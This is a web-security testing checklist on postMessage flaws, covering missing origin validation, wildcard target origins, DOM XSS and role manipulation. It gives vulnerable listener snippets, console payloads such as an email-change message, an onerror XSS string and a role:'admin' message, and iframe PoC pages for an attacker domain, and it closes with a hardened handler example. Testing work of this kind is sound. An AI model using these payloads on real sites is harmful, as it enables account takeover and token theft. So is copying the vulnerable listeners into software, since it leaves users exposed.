Web Messaging

Check List

Methodology

Black Box

Missing Origin Validation in postMessage Listener

1. Open the application in the browser.

2. Inspect the JavaScript files for message event listeners:

window.addEventListener("message", function(event){
   processMessage(event.data);
});

3. Verify whether origin validation is implemented:

if(event.origin !== "https://trusted.com") return;

4. If no origin check exists, the listener accepts messages from any origin.

5. Log in to your account, open the browser console and send a crafted message manually:

window.postMessage({action:"changeEmail",email:"attacker@test.com"},"*");

6. If the application processes the message without validating its origin, improper Web Messaging validation exists. Note that a message posted from the console carries the page's own origin, so the cross-origin case is confirmed with an external PoC page:

<html>
<body>
<iframe id="target" src="https://target.com"></iframe>
<script>
setTimeout(function(){
 document.getElementById("target").contentWindow.postMessage(
   {action:"changeEmail",email:"attacker@test.com"},
   "*"
 );
},3000);
</script>
</body>
</html>

7. Host the PoC on the attacker domain.

8. Open the PoC while authenticated to target.com. If the sensitive action is executed, missing origin validation in Web Messaging is confirmed.


Wildcard Target Origin Usage

1. Inspect the application JavaScript for outgoing postMessage calls:

otherWindow.postMessage({token:authToken},"*");

2. If the target origin is set to "*", the message is delivered whatever origin currently occupies the receiving window, so sensitive data may be exposed.

3. Create a malicious page that embeds the target application in an iframe:

<iframe id="victim" src="https://target.com"></iframe>
<script>
window.addEventListener("message",function(e){
   console.log("Leaked data:",e.data);
});
</script>

4. If the target application sends an authentication token or other sensitive information via postMessage with a wildcard target origin, the data leaks to the embedding page.

5. If the attacker page receives sensitive data without restriction, the Web Messaging misconfiguration is confirmed.


Insecure Message Handling Leading to DOM XSS

1. Inspect the message handler logic:

window.addEventListener("message",function(e){
   document.getElementById("output").innerHTML = e.data;
});

2. If message data is written directly to the DOM without sanitization, an XSS risk exists.

3. Log in, open the console and send a malicious message:

window.postMessage('<img src=x onerror=alert(1)>',"*");

4. If JavaScript executes in the application context, DOM-based XSS via Web Messaging is confirmed.

5. Create an external PoC page that sends the malicious payload through an iframe.

6. If the payload executes while the victim is authenticated, DOM-based XSS through Web Messaging against an authenticated user is confirmed.


Privilege Escalation via Message Parameter Manipulation

1. Inspect message listeners that control role or state:

window.addEventListener("message",function(e){
   if(e.data.role){
      user.role = e.data.role;
   }
});

2. Open the console and send a manipulated role:

window.postMessage({role:"admin"},"*");

3. Attempt to access an admin endpoint:

GET /api/admin/dashboard HTTP/1.1
Host: target.com
Cookie: session=abc123

4. If the server trusts the client-side role modified via the message event and grants privileged access, integrity control through Web Messaging is broken.

5. If unauthorized privilege escalation occurs due to unvalidated postMessage data, the Web Messaging vulnerability is confirmed.
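A listener and sender hardened against the four checks above (exact origin allow-list, structured data with allow-listed actions and no client-side role assignment, textContent instead of innerHTML, no wildcard target origin for sensitive data), as an added example that is not part of the original checklist. The TRUSTED_ORIGINS value, the action names and the `ui` object standing in for a DOM element are assumptions chosen for illustration.

```javascript
// Added example (not from the checklist): a postMessage listener hardened against the four
// findings above. TRUSTED_ORIGINS, the action names and the `ui` stand-in are assumptions.
const TRUSTED_ORIGINS = new Set(["https://trusted.com"]); // exact-match allow-list

// Each handler receives already-validated data and a UI object. None of them
// assigns a role or writes HTML: authorization stays server-side, rendering uses text.
const ACTIONS = {
  // textContent never parses markup, so '<img src=x onerror=alert(1)>' is shown as text.
  showMessage: function (data, ui) {
    ui.textContent = data.text == null ? "" : String(data.text);
    return "rendered";
  },
  // Display-only preference, coerced to one of two known values.
  setTheme: function (data, ui) {
    ui.theme = data.theme === "dark" ? "dark" : "light";
    return "theme";
  }
};

// Returns a small record of the decision so each branch can be checked.
function handleMessage(event, ui) {
  // 1. Exact origin match. No startsWith/indexOf: "https://trusted.com.evil.net" must fail.
  if (!TRUSTED_ORIGINS.has(event.origin)) return { ok: false, reason: "untrusted-origin" };
  // 2. Structured data only; a bare string from event.data never reaches the DOM.
  var data = event.data;
  if (typeof data !== "object" || data === null || typeof data.action !== "string") {
    return { ok: false, reason: "malformed" };
  }
  // 3. Allow-listed actions only; changeEmail, role changes etc. are dropped here.
  if (!Object.prototype.hasOwnProperty.call(ACTIONS, data.action)) {
    return { ok: false, reason: "unknown-action" };
  }
  return { ok: true, result: ACTIONS[data.action](data, ui) };
}

// Outgoing side: never post sensitive data with "*" or to an origin off the allow-list.
function sendToTrusted(targetWindow, data, targetOrigin) {
  if (targetOrigin === "*" || !TRUSTED_ORIGINS.has(targetOrigin)) {
    throw new Error("refusing to post sensitive data to target origin " + targetOrigin);
  }
  targetWindow.postMessage(data, targetOrigin);
}

// Wiring for a real page; guarded so the file also runs under Node for the demo.
if (typeof window !== "undefined") {
  window.addEventListener("message", function (e) {
    handleMessage(e, document.getElementById("output"));
  });
}
```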


White Box

Cheat Sheet
